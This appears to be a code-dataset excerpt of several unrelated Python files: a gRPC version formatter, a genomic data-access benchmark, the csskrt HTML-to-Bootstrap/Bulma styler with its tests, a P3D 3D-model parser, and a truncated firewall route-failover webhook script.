s = '%d.%d.%d' % (self.major, self.minor, self.patch)
if self.tag:
s += '-%s' % self.tag
return s
def pep440(self):
"""Version string in Python PEP440 style"""
s = '%d.%d.%d' % (self.major, self.minor, self.patch)
if self.tag:
# we need to translate from grpc version tags to pep440 version
# tags; this code is likely to be a little ad-hoc
if self.tag == 'dev':
s += '.dev0'
elif len(self.tag) >= 3 and self.tag[0:3] == 'pre':
s += 'rc%d' % int(self.tag[3:])
else:
raise Exception(
'Don\'t know how to translate version tag "%s" to pep440' %
self.tag)
return s
def ruby(self):
"""Version string in Ruby style"""
if self.tag:
return '%d.%d.%d.%s' % (self.major, self.minor, self.patch,
self.tag)
else:
return '%d.%d.%d' % (self.major, self.minor, self.patch)
def php(self):
"""Version string for PHP PECL package"""
s = '%d.%d.%d' % (self.major, self.minor, self.patch)
if self.tag:
if self.tag == 'dev':
s += 'dev'
elif len(self.tag) >= 3 and self.tag[0:3] == 'pre':
s += 'RC%d' % int(self.tag[3:])
else:
raise Exception(
'Don\'t know how to translate version tag "%s" to PECL version'
% self.tag)
return s
def php_stability(self):
"""stability string for PHP PECL package.xml file"""
if self.tag:
return 'beta'
else:
return 'stable'
def php_composer(self):
"""Version string for PHP Composer package"""
return '%d.%d.%d' % (self.major, self.minor, self.patch)
def mako_plugin(dictionary):
"""Expand version numbers:
- for each language, ensure there's a language_version tag in
settings (defaulting to the master version tag)
- expand version strings to major, minor, patch, and tag
"""
settings = dictionary['settings']
master_version = Version(settings['version'])
settings['version'] = master_version
for language in LANGUAGES:
version_tag = '%s_version' % language
if version_tag in settings:
settings[version_tag] = Version(settings[version_tag])
else:
settings[version_tag] = master_version
``` |
{
"source": "4d105s25p3/ibrowser2",
"score": 2
} |
#### File: 4d105s25p3/ibrowser2/speed_test.py
```python
import time
import random
import numpy
import read_data as rd
from timer import test_records, test_timer
from sys import argv
error = "Invaild input, see usage below"
usage = "Usage: speed_test.py [option] fileType dataFile testFile [dataTable]"
option_list = "Options: --best-chrom --P[number of process]"
error_file_type = "Unknown file type"
file_type = "Support File Type: --tabix --bigBed --bigWig. Data table file must be provided at last if type is tabix"
def main(args):
if args[1].startswith('--'):
options = args[0].strip().split("--")
print(options)
args = args[1:]
else:
options = []
data_type, data_file, test_file = args[:3]
num_of_process = 1
if options:
for option in options:
if "P" in option:
num_of_process = int(option.partition("=")[2])
if num_of_process > 1 and data_type != "--bigWig":
print("Error: Only bigWig format supports multi-process mode!")
exit(1)
data_table = None
if data_type == '--tabix':
data_table = args[3]
tests = []
with open(test_file, 'r') as inf:
inf.readline()
for line in inf:
line = line.strip()
if not line: continue
items = line.split('\t')
test = {'nSamples': int(items[0]), 'Length': int(items[1]), 'nBlocks': int(items[2]), 'Ref': items[3], 'Times': int(items[4])}
tests.append(test)
test_folder = test_file.rpartition('/')[0]
test_file_name = test_file.rpartition('/')[2]
res_file = test_folder + '/' + test_file_name.replace(".test", "") + '.result'
for i in tests: print(i)
if data_type == '--tabix':
data = rd.Tabix(data_file, data_table)
elif data_type == '--bigBed':
data = rd.BigBed(data_file)
elif data_type == '--bigWig':
data = rd.BigWig(data_file)
else:
print(error_file_type)
print(file_type)
exit(1)
chrom_sizes = data.chroms
output = "Test for Database: {}\nTest Options: {} {}\n\n".format(data_file, data_type, " ".join(options))
for test in tests:
data.switch_ref(test['Ref'])
for i in range(test['Times']):
if "best-chrom" in options:
chroms = list(chrom_sizes.items()) # [('chr1', 3000), ('chr2', 7200), ...]
available_chrom = [x for x in chroms if x[1] >= test['Length']]
if not available_chrom:
chrom = max(chroms, key = lambda x: x[1])[0]
else:
chrom = random.choice([x[0] for x in available_chrom])
else:
chrom = random.choice(list(chrom_sizes.keys()))
samples = random.sample(data.available_samples, test['nSamples'])
len_chrom = chrom_sizes[chrom]
if test['Length'] > len_chrom:
test['Length'] = len_chrom
print("WARNING: Length of target sequence has been cut to {}".format(test['Length']))
start = random.randrange(1, len_chrom - test['Length'] + 2)
end = start + test['Length'] - 1
if data_type == "--bigWig":
temp = data.get(test['nBlocks'], chrom, samples, start = start, end = end, processes = num_of_process)
# temp = another_test_timer(data.get_singleprocess, test['nBlocks'], chrom, samples, start = start, end = end)
else:
temp = data.get(test['nBlocks'], chrom, samples, start = start, end = end)
# temp = another_test_timer(data.get, test['nBlocks'], chrom, samples, start = start, end = end)
condition = "nSamples {} Length {} nBlocks {} Ref {} Times {}\n".format(test['nSamples'], test['Length'], test['nBlocks'], test['Ref'], test['Times'])
output += condition
output += "timer\tAverage\tStd\n"
print("\nResults for Test Condition: \n{}\n".format(test))
timer_list = ['sys', 'user', 'process', 'total']
for timer in timer_list:
print(timer)
raw = ','.join(["{:.4f}".format(x) for x in test_records[timer]])
average = numpy.mean(test_records[timer])
std = numpy.std(test_records[timer])
print("raw: {}".format(raw))
print("average: {:.4f}\n".format(average))
output += "{}\t{:.4f}\t{:.4f}\n".format(timer, average, std)
test_records[timer].clear()
output += '\n'
with open (res_file, 'w') as f:
f.write(output)
if __name__ == '__main__':
if len(argv) > 6 or len(argv) < 4:
print(error)
print(usage)
print(option_list)
print(file_type)
else:
main(argv[1:])
``` |
{
"source": "4d11/csskrt-csskrt",
"score": 2
} |
#### File: csskrt/scripts/bootstrapCsskrt.py
```python
from bs4 import Tag
from .csskrt import Csskrt
class BootstrapCsskrt(Csskrt):
def __init__(self, fileName):
tag_styles = {
'input': 'form-control',
'select': 'custom-select',
'button': 'btn btn-primary',
'checkbox': 'form-check-input',
'radio': 'form-check-input',
}
super().__init__(fileName, tag_styles)
def version(self):
return "v4.1"
def get_starter_tags(self):
charset_meta = self.soup.new_tag(
'meta', charset='utf-8'
)
# hack since 'name' is reserve
viewport_meta = Tag(
builder=self.soup.builder,
name='meta',
attrs={'name': "viewport", 'content': 'width=device-width, initial-scale=1, shrink-to-fit=no'}
)
stylesheet = self.soup.new_tag(
'link',
rel='stylesheet',
href='https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css',
integrity='<KEY>',
crossorigin='anonymous'
)
return [charset_meta, viewport_meta, stylesheet]
def get_wrapper_tag(self):
div = self.soup.new_tag(
'div', **{'class': 'container'}
)
return div
def get_table_styles(self):
return {
'table': 'table',
'thead': 'thead-light',
}
def get_list_styles(self):
return {
'ol': 'list-group',
'ul': 'list-group',
'li': 'list-group-item'
}
def add_form_classes(self, tag_dict: dict):
"""
Applies form classes, only difference between this and parent implementation is the addition of adding
the "input group wrapper" class
:return:
"""
for form in self.soup.find_all('form'):
input_ = None
label = None
for elem in form.children:
if elem.name == 'label':
label = elem
# See if there is a input within the label (sometimes done for radio/cb)
input_within_label = elem.find_all('input', recursive=False)
if input_within_label:
# todo handle this case
raise Warning("No support for inputs nested within labels for Bootstrap"
"for now.")
elif elem.name == 'input' or elem.name == 'select':
if input_:
raise Exception("Found input without adjacent label")
else:
input_ = elem
if elem.get('type') == 'radio':
if 'radio' in tag_dict:
self.add_class_to_element(elem, tag_dict['radio'])
elif elem.get('type') == 'checkbox':
if 'checkbox' in tag_dict:
self.add_class_to_element(elem, tag_dict['checkbox'])
else:
self.add_class_to_element(elem, tag_dict['input'])
elif elem.name == 'div':
# todo handle the case we have a prexisting div in form
raise Warning("No support yet for input elements in divs within a form")
# Add overall wrapper
if input_ and label:
if input_.get('type') == 'radio' or input_.get('type') == 'checkbox':
self.add_class_to_element(label, 'form-check-label')
field_div = self.soup.new_tag('div', **{'class': 'form-check'})
# Add label then input
input_.wrap(field_div)
field_div.append(label)
else:
field_div = self.soup.new_tag('div', **{'class': 'form-group'})
# Add label then input
label.wrap(field_div)
field_div.append(input_)
input_, label = None, None
```
#### File: csskrt/scripts/csskrt.py
```python
from bs4 import BeautifulSoup, Tag
import os
from abc import ABC, abstractmethod
from typing import List, Dict, NoReturn
class Csskrt(ABC):
def __init__(self, filename: str, tag_styles: Dict):
f = open(filename) # should be able to handle dirs (for later) todo
f_data = f.read()
self.file_path = filename
self.soup = BeautifulSoup(f_data, 'html.parser')
self.tag_styles = tag_styles
@abstractmethod
def get_starter_tags(self) -> List[Tag]:
"""
Return a list of the Tags you want to add to the <head>
:return:
"""
pass
@abstractmethod
def get_wrapper_tag(self) -> List[Tag] or None:
"""
Return the 'wrapper' class for your framework.
Eg. 'container' for Bootstrap
:return:
"""
pass
@abstractmethod
def get_table_styles(self) -> Dict:
"""
Return a dictionary of the table-specific tag and the corresponding
css styles
Eg. { 'table': 'my-table-class, 'thead': 'my-thead-class' }
:return:
"""
@abstractmethod
def version(self) -> str:
"""
:return: The version number
"""
@abstractmethod
def get_list_styles(self) -> Dict:
"""
:return:
"""
def add_class_to_element(self, elem, css_class):
if not elem.get('class'):
elem['class'] = css_class
else:
try:
elem['class'].append(css_class)
except AttributeError:
elem['class'] += ' ' + css_class
def initialize_framework(self, head: Tag, tags: List[Tag]):
"""
Applys the header tags to the head
:param head:
:param tags:
:return:
"""
for tag in tags:
head.append(tag)
def add_wrapper_tag(self, wrapper_tag: Tag):
"""
Add the container tag for the framework
:param wrapper_tag:
:return:
"""
# potentially optimize by using wrap and swapping attributes?
body_children = list(self.soup.body.children)
self.soup.body.clear()
self.soup.body.append(wrapper_tag)
for child in body_children:
wrapper_tag.append(child)
def add_form_classes(self, tag_dict: dict) -> NoReturn:
"""
Adds classes for form fields
:param tag_dict:
:return:
"""
for form in self.soup.find_all('form'):
for elem in form.children:
if elem.name == 'label':
if 'label' in tag_dict:
self.add_class_to_element(elem, tag_dict['label'])
elif elem.name == 'input':
self.add_class_to_element(elem, tag_dict['input'])
if elem.get('type') == 'radio':
if 'radio' in tag_dict:
self.add_class_to_element(elem, tag_dict['radio'])
elif elem.get('type') == 'checkbox':
if 'checkbox' in tag_dict:
self.add_class_to_element(elem, tag_dict['checkbox'])
# elif type(elem) == Tag: # ignore NavigableStrings like /n
# if tag_dict.get(elem.name):
# self.add_class_to_element(elem, tag_dict[elem.name])
def add_table_classes(self, table_tag_dict: dict) -> NoReturn:
"""
Apply the styles to table elements
Supports the following tags:
('table', 'thead', 'tbody', 'tfoot', 'tr', 'th', 'td')
:param table_tag_dict:
:return:
"""
table_keys = ('thead', 'tbody', 'tfoot', 'tr', 'th', 'td')
for table in self.soup.find_all('table'):
if table_tag_dict.get('table'): # Add style to table tag
self.add_class_to_element(table, table_tag_dict['table'])
for tk in table_keys:
if table_tag_dict.get(tk):
all_table_elems = table.find_all(tk)
for elem in all_table_elems:
self.add_class_to_element(elem, table_tag_dict[tk])
def add_list_classes(self, list_tags: dict) -> NoReturn:
"""
Supports the following tags:
('ul', 'ol', 'li')
:param list_tags:
:return:
"""
for list in self.soup.find_all(['ol', 'ul']):
if list.name == 'ul' and list_tags.get('ul'):
self.add_class_to_element(list, list_tags['ul'])
elif list.name == 'ol' and list_tags.get('ol'):
self.add_class_to_element(list, list_tags['ol'])
if list_tags.get('li'):
for li in list.find_all('li', recursive=False):
# recursive=False to prevent double modifying for nested lists
self.add_class_to_element(li, list_tags['li'])
def add_general_classes(self):
"""
Adds styles to single elements
:return:
"""
supported_classes = (
'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'button', 'a', 'nav'
)
for tag in self.tag_styles:
if tag in supported_classes:
for elem in self.soup.find_all(tag):
self.add_class_to_element(elem, self.tag_styles[tag])
def output(self, pretty_print: bool) -> NoReturn:
"""
Outputs a new file.
:return:
"""
folder = os.path.dirname(self.file_path)
file = os.path.basename(self.file_path)
file_name, ext = os.path.splitext(file)
new_file_name = os.path.join(folder, file_name + '_csskrt' + ext)
with open(new_file_name, 'w') as out_file:
if pretty_print:
out_file.write(str(self.soup))
else:
out_file.write(self.soup.prettify())
def freshify(self) -> NoReturn:
"""
Main function that applies all the necessary styles
:return:
"""
starter_tags = self.get_starter_tags()
wrapper_tag = self.get_wrapper_tag()
table_styles = self.get_table_styles()
list_styles = self.get_list_styles()
# Modify the head
if self.soup.head:
self.initialize_framework(self.soup.head, starter_tags)
# Add the "wrapper" tag
if wrapper_tag:
self.add_wrapper_tag(wrapper_tag)
# Elements that have children eg. tables, lists, forms have their own
# dedicated function to support complex operations if necessary.
self.add_form_classes(self.tag_styles)
self.add_list_classes(list_styles)
self.add_table_classes(table_styles)
# Add styles for the rest of the elements
self.add_general_classes()
return self.soup
```
#### File: csskrt-csskrt/test/test_bootstrap.py
```python
import sys, os
import copy
import pytest
from bs4 import BeautifulSoup
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from csskrt.scripts.bootstrapCsskrt import BootstrapCsskrt
@pytest.fixture()
def bootstrap_csskrt():
bs_csskrt = BootstrapCsskrt(os.path.join(os.path.dirname(__file__), 'test1.html'))
before = copy.copy(bs_csskrt.soup)
bs_csskrt.freshify()
after = bs_csskrt.soup
return before, after
class TestBootstrapButtons():
def test_compare_num_button_tags(self, bootstrap_csskrt):
before: BeautifulSoup = bootstrap_csskrt[0]
after: BeautifulSoup = bootstrap_csskrt[1]
tag = 'button'
old_tags = before.find_all(tag)
new_tags = after.find_all(tag)
assert (len(old_tags) == len(new_tags))
def test_buttons_styles(self, bootstrap_csskrt):
before: BeautifulSoup = bootstrap_csskrt[0]
after: BeautifulSoup = bootstrap_csskrt[1]
tag = 'button'
style = ['btn', 'btn-primary']
old_tags = before.find_all(tag)
new_tags = after.find_all(tag)
for old_t, new_t in zip(old_tags, new_tags):
old_class = old_t.get('class', [])
new_class = new_t.get('class', [])
if type(new_class) == str: # sometimes get returns str instead of list
new_class = new_class.strip().split(' ')
assert(set(old_class).issubset(new_class))
def test_buttons_content(self, bootstrap_csskrt):
before: BeautifulSoup = bootstrap_csskrt[0]
after: BeautifulSoup = bootstrap_csskrt[1]
tag = 'button'
old_tags = before.find_all(tag)
new_tags = after.find_all(tag)
for old_t, new_t in zip(old_tags, new_tags):
assert old_t.get_text() == new_t.get_text()
class TestBootstrapForm():
def test_number_form_tags(self, bootstrap_csskrt):
before: BeautifulSoup = bootstrap_csskrt[0]
after: BeautifulSoup = bootstrap_csskrt[1]
tag = 'form'
old_tags = before.find_all(tag)
new_tags = after.find_all(tag)
assert (len(old_tags) == len(new_tags))
def check_checkboxes(self, bootstrap_csskrt):
before: BeautifulSoup = bootstrap_csskrt[0]
after: BeautifulSoup = bootstrap_csskrt[1]
tag = 'form'
new_tags = after.find_all(tag)
for form in new_tags:
checkbox = form.find_all('input', type='checkbox')
assert(checkbox.get('class') == 'form-check-input')
parent = checkbox.parent
assert(parent.name == 'div' and parent.get('class') == 'form-check')
```
#### File: csskrt-csskrt/test/test_bulma.py
```python
import sys, os
import copy
import pytest
from bs4 import BeautifulSoup
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from csskrt.scripts.bulmaCsskrt import BulmaCsskrt
@pytest.fixture()
def bulma_csskrt():
bulma_csskrt = BulmaCsskrt(os.path.join(os.path.dirname(__file__), 'test1.html'))
before = copy.copy(bulma_csskrt.soup)
bulma_csskrt.freshify()
after = bulma_csskrt.soup
return before, after
class TestBulmaButtons():
def test_compare_num_button_tags(self, bulma_csskrt):
before: BeautifulSoup = bulma_csskrt[0]
after: BeautifulSoup = bulma_csskrt[1]
tag = 'button'
old_tags = before.find_all(tag)
new_tags = after.find_all(tag)
assert (len(old_tags) == len(new_tags))
def test_buttons_styles(self, bulma_csskrt):
before: BeautifulSoup = bulma_csskrt[0]
after: BeautifulSoup = bulma_csskrt[1]
tag = 'button'
style = ['button']
old_tags = before.find_all(tag)
new_tags = after.find_all(tag)
for old_t, new_t in zip(old_tags, new_tags):
old_class = old_t.get('class', [])
new_class = new_t.get('class', [])
if type(new_class) == str: # sometimes get returns str instead of list
new_class = new_class.strip().split(' ')
assert(set(old_class).issubset(new_class))
def test_buttons_content(self, bulma_csskrt):
before: BeautifulSoup = bulma_csskrt[0]
after: BeautifulSoup = bulma_csskrt[1]
tag = 'button'
old_tags = before.find_all(tag)
new_tags = after.find_all(tag)
for old_t, new_t in zip(old_tags, new_tags):
assert old_t.get_text() == new_t.get_text()
class TestBootstrapForm():
def test_number_form_tags(self, bulma_csskrt):
before: BeautifulSoup = bulma_csskrt[0]
after: BeautifulSoup = bulma_csskrt[1]
tag = 'form'
old_tags = before.find_all(tag)
new_tags = after.find_all(tag)
assert (len(old_tags) == len(new_tags))
def test_select_tags(self, bulma_csskrt):
before: BeautifulSoup = bulma_csskrt[0]
after: BeautifulSoup = bulma_csskrt[1]
tag = 'form'
old_tags = before.find_all(tag)
new_tags = after.find_all(tag)
for form in new_tags:
for select in form.find_all('select'):
assert(select.parent.name == 'div' and 'select' in select.parent['class'] )
assert (select.parent.parent.name == 'div' and
'control' in select.parent.parent['class'])
assert (select.parent.parent.parent.name == 'div' and
'field' in select.parent.parent.parent['class'])
``` |
{
"source": "4d4a5852/py3d",
"score": 3
} |
#### File: py3d/py3d/__init__.py
```python
import struct
import collections
def _read_asciiz(f, encoding="utf-8"):
pos = f.tell()
bts = b""
while b"\0" not in bts:
bts += f.read(1024)
bts = bts[:bts.index(b"\0")]
f.seek(pos + len(bts) + 1)
return str(bts, encoding=encoding)
class Point:
def __init__(self, f=None):
self.coords = (0,0,0)
self.flags = 0
self.mass = None
if f is not None:
self.read(f)
def read(self, f):
self.coords = struct.unpack("fff", f.read(12))
self.flags = struct.unpack("<L", f.read(4))[0]
def write(self, f):
f.write(struct.pack("fff", *self.coords))
f.write(struct.pack("<L", self.flags))
class Vertex:
def __init__(self, all_points, all_normals, f=None):
self.all_points = all_points
self.all_normals = all_normals
self.point_index = None
self.normal_index = None
self.uv = (0, 0)
if f is not None:
self.read(f)
@property
def point(self):
return self.all_points[self.point_index]
@point.setter
def point(self, value):
this.point_index = self.all_points.index(value)
@property
def normal(self):
return self.all_normals[self.normal_index]
@point.setter
def normal(self, value):
this.normal_index = self.all_normals.index(value)
def read(self, f):
self.point_index = struct.unpack("<L", f.read(4))[0]
self.normal_index = struct.unpack("<L", f.read(4))[0]
self.uv = struct.unpack("ff", f.read(8))
def write(self, f):
f.write(struct.pack("<L", self.point_index))
f.write(struct.pack("<L", self.normal_index))
f.write(struct.pack("ff", *self.uv))
class Face:
def __init__(self, all_points, all_normals, f=None):
self.all_points = all_points
self.all_normals = all_normals
self.vertices = []
self.flags = 0
self.texture = ""
self.material = ""
if f is not None:
self.read(f)
def read(self, f):
num_vertices = struct.unpack("<L", f.read(4))[0]
assert num_vertices in (3,4)
self.vertices = [Vertex(self.all_points, self.all_normals, f) for i in range(num_vertices)]
if num_vertices == 3:
f.seek(16, 1)
self.flags = struct.unpack("<L", f.read(4))[0]
self.texture = _read_asciiz(f)
self.material = _read_asciiz(f)
def write(self, f):
f.write(struct.pack("<L", len(self.vertices)))
for v in self.vertices:
v.write(f)
if len(self.vertices) == 3:
f.write(b"\0" * 16)
f.write(struct.pack("<L", self.flags))
f.write(bytes(self.texture, encoding="utf-8") + b"\0")
f.write(bytes(self.material, encoding="utf-8") + b"\0")
class Selection:
def __init__(self, all_points, all_faces, f=None):
self.all_points = all_points
self.all_faces = all_faces
self.points = {}
self.faces = {}
if f is not None:
self.read(f)
def read(self, f):
num_bytes = struct.unpack("<L", f.read(4))[0]
data_points = f.read(len(self.all_points))
data_faces = f.read(len(self.all_faces))
self.points = {p: (lambda weight: weight if weight <= 1 else 1 - ((weight - 1) / 255))(data_points[i]) for i, p in enumerate(self.all_points) if data_points[i] > 0}
self.faces = {fa: (lambda weight: weight if weight <= 1 else 1 - ((weight - 1) / 255))(data_faces[i]) for i, fa in enumerate(self.all_faces) if data_faces[i] > 0}
def write(self, f):
f.write(struct.pack("<L", len(self.all_points) + len(self.all_faces)))
data_points = [(lambda weight: weight if weight in (1,0) else round((1 - weight) * 255) + 1)(self.points[p]) if p in self.points else 0 for p in self.all_points]
f.write(bytes(data_points))
data_faces = [(lambda weight: weight if weight in (1,0) else round((1 - weight) * 255) + 1)(self.faces[fa]) if fa in self.faces else 0 for fa in self.all_faces]
f.write(bytes(data_faces))
class LOD:
def __init__(self, f=None):
self.version_major = 28
self.version_minor = 256
self.resolution = 1.0
self.points = []
self.facenormals = []
self.faces = []
self.sharp_edges = []
self.properties = collections.OrderedDict()
self.selections = collections.OrderedDict()
if f is not None:
self.read(f)
@property
def mass(self):
masses = [x.mass for x in self.points]
if len([x for x in masses if x is not None]) == 0:
return None
return sum(masses)
@property
def num_vertices(self):
return sum([len(x.vertices) for x in self.faces])
def read(self, f):
assert f.read(4) == b"P3DM"
self.version_major = struct.unpack("<L", f.read(4))[0]
self.version_minor = struct.unpack("<L", f.read(4))[0]
num_points = struct.unpack("<L", f.read(4))[0]
num_facenormals = struct.unpack("<L", f.read(4))[0]
num_faces = struct.unpack("<L", f.read(4))[0]
f.seek(4, 1)
self.points.extend([Point(f) for i in range(num_points)])
self.facenormals.extend([struct.unpack("fff", f.read(12)) for i in range(num_facenormals)])
self.faces.extend([Face(self.points, self.facenormals, f) for i in range(num_faces)])
assert f.read(4) == b"TAGG"
while True:
f.seek(1, 1)
taggname = _read_asciiz(f)
if taggname[0] != "#":
self.selections[taggname] = Selection(self.points, self.faces, f)
continue
num_bytes = struct.unpack("<L", f.read(4))[0]
data = f.read(num_bytes)
if taggname == "#EndOfFile#":
break
if taggname == "#SharpEdges#": #untested
self.sharp_edges.extend([struct.unpack("<LL", data[i*8:i*8+8]) for i in range(int(num_bytes / 8))])
continue
if taggname == "#Property#": #untested
assert num_bytes == 128
k, v = data[:64], data[64:]
assert b"\0" in k and b"\0" in v
k, v = k[:k.index(b"\0")], v[:v.index(b"\0")]
self.properties[str(k, "utf-8")] = str(v, "utf-8")
continue
if taggname == "#Mass#":
assert num_bytes == 4 * num_points
for i in range(num_points):
self.points[i].mass = struct.unpack("f", data[i*4:i*4+4])[0]
continue
#if taggname == "#Animation#": #not supported
# pass
#if taggname == "#UVSet#": #ignored, data from lod faces used
# pass
self.resolution = struct.unpack("f", f.read(4))[0]
def write(self, f):
f.write(b"P3DM")
f.write(struct.pack("<L", self.version_major))
f.write(struct.pack("<L", self.version_minor))
f.write(struct.pack("<L", len(self.points)))
f.write(struct.pack("<L", len(self.facenormals)))
f.write(struct.pack("<L", len(self.faces)))
f.write(b"\0" * 4)
for p in self.points:
p.write(f)
for fn in self.facenormals:
f.write(struct.pack("fff", *fn))
for fa in self.faces:
fa.write(f)
f.write(b"TAGG")
if len(self.sharp_edges) > 0: #untested
f.write(b"\x01")
f.write(b"#SharpEdges#\0")
f.write(struct.pack("<L", len(self.sharp_edges) * 8))
for se in self.sharp_edges:
f.write(struct.pack("<LL", *se))
for k, v in self.selections.items():
f.write(b"\x01")
f.write(bytes(k, "utf-8") + b"\0")
v.write(f)
for k, v in self.properties.items():
f.write(b"\x01")
f.write(b"#Property#\0")
f.write(struct.pack("<L", 128))
f.write(struct.pack("64s64s", bytes(k, "utf-8"), bytes(v, "utf-8")))
if self.mass is not None:
f.write(b"\x01")
f.write(b"#Mass#\0")
f.write(struct.pack("<L", len(self.points) * 4))
for p in self.points:
f.write(struct.pack("f", p.mass))
if len(self.faces) > 0:
f.write(b"\x01")
f.write(b"#UVSet#\0")
f.write(struct.pack("<L", self.num_vertices * 8 + 4))
f.write(b"\0\0\0\0")
for fa in self.faces:
for v in fa.vertices:
f.write(struct.pack("ff", *v.uv))
f.write(b"\x01")
f.write(b"#EndOfFile#\0")
f.write(b"\0\0\0\0")
f.write(struct.pack("f", self.resolution))
class P3D:
def __init__(self, f=None):
self.lods = []
if f is not None:
self.read(f)
def read(self, f):
assert f.read(4) == b"MLOD"
version = struct.unpack("<L", f.read(4))[0]
num_lods = struct.unpack("<L", f.read(4))[0]
self.lods.extend([LOD(f) for i in range(num_lods)])
def write(self, f):
f.write(b"MLOD")
f.write(struct.pack("<L", 257))
f.write(struct.pack("<L", len(self.lods)))
for l in self.lods:
l.write(f)
``` |
{
"source": "4D5A/ngf-automation",
"score": 3
} |
#### File: powershell/multisubudrupdate/call_udr_webhook.py
```python
import os
import logging
import re
import ConfigParser
import json
import commands
import time
logger = logging.getLogger(__name__)
#Parsing config files for the NGF network needs to only read the boxnet
#configuration
def read_boxnet(filename,confsec):
import StringIO
boxnet = StringIO.StringIO()
boxnet.write("[" + confsec + "]\n")
try:
with open(filename) as infile:
copy = False
for line in infile:
if line.strip() == "[" + confsec + "]":
copy = True
elif line.strip() == "":
copy = False
elif copy:
boxnet.write(str(line))
except IOError:
logging.warning("Unable to open config file" + filename)
exit()
boxnet.seek(0, os.SEEK_SET)
#print boxnet.getvalue()
return boxnet
def get_boxip(confpath, conffile,section='boxnet'):
boxconf = ConfigParser.ConfigParser()
boxconf.readfp(read_boxnet(confpath + conffile,section))
foundip = boxconf.get(section,'IP')
logger.info("Collecting the box IP from: " + conffile + " from section: " + section + " and IP found is: " + foundip)
return foundip
def call_webhook(url, subid, id, boxip, haip):
try:
import requests
except ImportError:
requests = None
import urllib2
import ssl
#print url
payload = '[{"SubscriptionId":"' + str(subid) + '","id":"' + str(id) + '","properties":{"OldNextHopIP":"' + str(haip) + '","NewNextHopIP":"' + str(boxip) + '"}}]'
logger.debug(payload)
#print payload
# POST with JSON
if requests:
r = requests.post(url, data=json.dumps(payload))
else:
request = urllib2.Request(url, headers={'User-Agent':'NGFPython'})
request.add_header('Content-Type', 'application/json')
try:
r = urllib2.urlopen(request, json.dumps(payload))
results = r.read()
return results
except urllib2.URLError as e:
logging.warning("URL Call failed because: " + e.message)
return 'FAILED'
def main():
from optparse import OptionParser
usage = """usage: %prog [options]
example: %prog -u http://uniquewebhookurl.com/path -s S1_UKNGFW
use of -l and -c are optional as the script already contains the default locations used by the CGF
"""
parser = OptionParser(usage=usage)
loglevels = ['CRITICAL', 'FATAL', 'ERROR', 'WARNING', 'WARN', 'INFO', 'DEBUG', 'NOTSET']
parser.add_option("-v", "--verbosity", default="info",
help="available loglevels: %s [default: %%default]" % ','.join(l.lower() for l in loglevels))
parser.add_option("-u", "--webhookurl", default='', help="URL of automation webhook")
parser.add_option("-c", "--configpath", default='/opt/phion/config/active/', help="source path of log files to upload")
parser.add_option("-l", "--logfilepath", default='/phion0/logs/update_UDR.log', help="logfile path and name")
parser.add_option("-s", "--servicename", default='S1_NGFW', help="name of the NGFW service with server prepended")
parser.add_option("-i", "--secondip", default='', help="name of second NIC ip address")
parser.add_option("-n", "--vnetname", default='NGF', help="name of virtual network used for ASM")
parser.add_option("-d", "--down", default='', help="to handle split brain have the CGF call with this added. So it triggers on stop too.")
# parse argsbox
(options, args) = parser.parse_args()
if options.verbosity.upper() in loglevels:
options.verbosity = getattr(logging,options.verbosity.upper())
logger.setLevel(options.verbosity)
else:
parser.error("invalid verbosity selected. please check --help")
logging.basicConfig(filename=options.logfilepath,format="%(asctime)s %(levelname)-7s - %(message)s")
servicename = options.servicename
confpath = options.configpath
#collects the VNET ID if provided
vnetname = str(options.vnetname)[1:-1]
logger.info("VNETName" + str(vnetname))
logger.info(str(options.down) + " the script has been triggered with for the stop condition.")
loopnum = 1
#Creates a loop so that if this fails it will repeat the attempt, will stop
#after 10 attempts
condition = True
while condition:
#increases the wait period between loops so 2nd loop runs 30 seconds after
#the first, 2nd loop is 60 seconds, 3rd is 90 seconds, so last loop is 4 and
#a half minutes delay over the previous.
sleeptime = 30 * loopnum
logger.info("UDR Webhook script triggered, iteration number:" + str(loopnum))
#Get's the configuration files for HA
#The boxip is the IP taken from the local network config file. On failover
#this should be the IP of the active box.
boxip = get_boxip(confpath,'boxnet.conf')
if len(boxip) < 5:
logger.warning("Wasn't able to collect boxip from " + confpath)
exit()
#New section to address dual NIC boxes where second IP is needed
if len(options.secondip) > 1:
secondboxip = get_boxip(confpath,'boxnet.conf','addnet_' + options.secondip)
if len(boxip) < 5:
logger.warning("Wasn't able to collect second boxip from " + confpath)
exit()
#The boxip is the IP taken from the ha network config file. Clusters reverse
#this pair of files so this should be the other box.
haip = get_boxip(confpath,'boxnetha.conf')
if len(haip) < 5:
logger.warning("Wasn't able to collect HA boxip from " + confpath)
exit()
#New section to address dual NIC boxes where second IP is needed
if len(options.secondip) > 1:
secondhaip = get_boxip(confpath,'boxnetha.conf','addnet_' + options.secondip)
if len(boxip) < 5:
logger.warning("Wasn't able to collect HA second boxip from " + confpath)
exit()
cloudconf = ConfigParser.ConfigParser()
#opens the config file for cloud integration and creates a dummy section
with open(confpath + 'cloudintegration.conf', 'r') as f:
config_string = '[dummy_section]\n' + f.read()
#creates a temp file for conf parser to read that contains the dummy section
#header.
with open('/tmp/cloud.conf', 'a') as the_file:
the_file.write(config_string)
#ConfigParser reads in from the temp file with the dummy section at the top
try:
cloudconf.read('/tmp/cloud.conf')
except ConfigParser.ParsingError:
pass
#Check that we have the sections before we find the subscription
if cloudconf.sections() > 0:
subid = cloudconf.get('azure','SUBSCRIPTIONID')
#Check that the subscription makes sense.
if len(str(subid)) < 20:
logger.warning("Wasn't able to collect a valid subscription id from " + confpath)
exit()
else:
logger.info("Collected the Azure subscription ID")
#cleans up the temp conf file.
os.remove('/tmp/cloud.conf')
logger.info("Service Status:" + str(commands.getoutput('ps -fC ' + servicename)))
#if the box is the active unit then proceeds to push failover towards this
#boxes IP.
if(commands.getoutput('ps -fC ' + servicename).find(servicename) != -1):
#pauses between loops , this is at the front to allow some margin
#on trigger
#for temporary Azure network losses which are sometimes seen.
logger.info("Sleeping for " + str(sleeptime))
time.sleep(sleeptime)
logger.info("This NGF has been detected as active, failing over to this box IP " + boxip)
logger.info("Calling the Webhook on :" + str(options.webhookurl))
webhook = call_webhook(options.webhookurl, str(subid)[2:-2], vnetname, boxip, haip)
logger.info(webhook)
if (webhook != 'FAILED'):
condition = False
if (json.loads(webhook)['JobIds']):
logger.info("Success JobID:" + (str(json.loads(webhook)['JobIds'])[2:-2]))
else:
logger.warning("failure to get status from webhook:" + webhook)
if len(options.secondip) > 1:
